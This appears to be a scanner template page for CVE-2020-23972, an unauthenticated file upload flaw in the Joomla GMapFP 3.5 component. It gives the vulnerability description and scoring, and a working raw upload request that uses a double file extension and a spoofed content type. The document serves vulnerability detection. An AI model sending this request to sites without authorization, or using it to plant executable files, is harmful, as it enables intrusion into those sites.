Joomla! Component GMapFP 3.5 - Arbitrary File Upload

ID: CVE-2020-23972

Severity: high

Author: dwisiswant0

Tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!

Description

Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the applicationwithout authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.

YAML Source

id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
    without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
  remediation: |
    Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
    epss-score: 0.53621
    epss-percentile: 0.9756
    cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
  metadata:
    max-request: 2
    vendor: gmapfp
    product: gmapfp
    framework: joomla\!
  tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
variables:
  name: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
        Content-Type: text/html

        projectdiscovery

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
        part: body
# digest: 4a0a00473045022100d4c5527546d004ed09656123d01b77b084cd6db8c571ec2d6daef1c31cee27fa02204ac820a0a956cb2579a1d1763115c9572f60ac735bc25c0a613bb5ff971c3ad0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-23972.yaml"

View on Github